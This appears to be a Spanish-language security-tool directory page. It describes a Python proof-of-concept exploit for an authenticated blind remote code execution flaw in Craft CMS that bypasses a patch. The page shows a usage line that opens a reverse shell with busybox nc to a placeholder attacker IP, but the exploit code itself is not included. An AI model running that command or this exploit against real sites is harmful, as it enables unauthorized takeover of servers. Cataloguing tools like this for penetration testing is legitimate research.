Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-28695 — PoC de exploit en Python para CVE-2026-28695, un RCE ciego autenticado en Craft CMS que elude el parche de create() de BaseObject y genera una reverse shell. | Kitploit
Herramientas/GitHubGitHub/predyy/cve-2026-28695
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónSeguridad WebPruebas de PenetraciónRed TeamingHerramienta de Acceso Remoto
GitHubpredyy/cve-2026-28695

CVE-2026-28695

PoC de exploit en Python para CVE-2026-28695, un RCE ciego autenticado en Craft CMS que elude el parche de create() de BaseObject y genera una reverse shell.

13hace 4 díasAún no revisado
Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-28695 Bypass de parche - RCE ciega en Craft CMS

Ejecución remota de código ciega y autenticada en Craft CMS. Omite la restricción create() - BaseObject añadida en la corrección de CVE-2026-28695 (commit e31e508).

Uso

python3 exp.py -t http://target.htb -u user -p 'password' -c 'busybox nc ATTACKER_IP ATTACKER_PORT -e /bin/sh'

Descargo de responsabilidad

Este script está destinado únicamente a fines educativos. El autor no es responsable de ningún uso indebido o daño causado por este exploit. ¡Asegúrate siempre de tener permiso antes de probar o explotar vulnerabilidades!

Descargar herramienta